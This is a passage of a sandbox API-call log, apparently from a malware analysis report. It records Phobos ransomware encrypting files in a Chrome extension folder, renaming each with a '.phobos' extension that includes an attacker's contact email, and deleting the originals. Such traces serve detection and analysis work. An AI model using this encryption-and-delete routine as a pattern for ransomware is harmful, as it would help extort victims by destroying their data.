lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.195] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.195] CloseHandle (hObject=0x148) returned 1 [0148.195] CloseHandle (hObject=0x188) returned 1 [0148.195] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html")) returned 1 [0148.196] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.197] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=95) returned 1 [0148.197] CloseHandle (hObject=0x188) returned 1 [0148.197] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js")) returned 0x2020 [0148.197] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.197] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.197] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.198] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.198] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.198] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x5f, lpOverlapped=0x0) returned 1 [0148.198] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0148.199] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x60, lpOverlapped=0x0) returned 1 [0148.199] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.199] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.199] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x30, dwBufLen=0x30 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x30) returned 1 [0148.199] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.200] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe2, lpOverlapped=0x0) returned 1 [0148.200] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.200] CloseHandle (hObject=0x188) returned 1 [0148.200] CloseHandle (hObject=0x148) returned 1 [0148.200] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js")) returned 1 [0148.201] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.201] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=725) returned 1 [0148.201] CloseHandle (hObject=0x148) returned 1 [0148.202] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json")) returned 0x2020 [0148.202] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.202] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.202] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.202] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.202] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.202] ReadFile (in: hFile=0x148, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2d5, lpOverlapped=0x0) returned 1 [0148.257] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2e0, dwBufLen=0x2e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2e0) returned 1 [0148.258] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2e0, lpOverlapped=0x0) returned 1 [0148.259] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.259] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.259] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.259] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.259] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.259] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.259] CloseHandle (hObject=0x148) returned 1 [0148.259] CloseHandle (hObject=0x188) returned 1 [0148.259] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json")) returned 1 [0148.260] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.261] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=274) returned 1 [0148.261] CloseHandle (hObject=0x188) returned 1 [0148.261] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json")) returned 0x2020 [0148.261] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.261] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.261] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.262] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.262] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.262] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x112, lpOverlapped=0x0) returned 1 [0148.263] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120, dwBufLen=0x120 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120) returned 1 [0148.263] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x120, lpOverlapped=0x0) returned 1 [0148.264] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.264] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.264] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.264] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.264] WriteFile (in: hFile=0x148, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.264] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.264] CloseHandle (hObject=0x188) returned 1 [0148.264] CloseHandle (hObject=0x148) returned 1 [0148.265] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json")) returned 1 [0148.266] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.266] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=214) returned 1 [0148.266] CloseHandle (hObject=0x148) returned 1 [0148.267] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json")) returned 0x2020 [0148.267] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0148.267] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.267] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0148.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.267] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0148.267] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.267] ReadFile (in: hFile=0x148, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd6, lpOverlapped=0x0) returned 1 [0148.268] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0148.268] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0148.269] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0148.269] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0148.269] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0148.269] CryptDestroyKey (hKey=0xa32da8) returned 1 [0148.269] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0148.269] CryptDestroyKey (hKey=0xa327e8) returned 1 [0148.269] CloseHandle (hObject=0x148) returned 1 [0148.269] CloseHandle (hObject=0x188) returned 1 [0148.270] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json")) returned 1 [0148.271] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0148.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0148.271] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=215) returned 1 [0148.271] CloseHandle (hObject=0x188) returned 1 [0148.271] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json")) returned 0x2020 [0148.271] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_US\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_us\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0148.271] CreateFileW 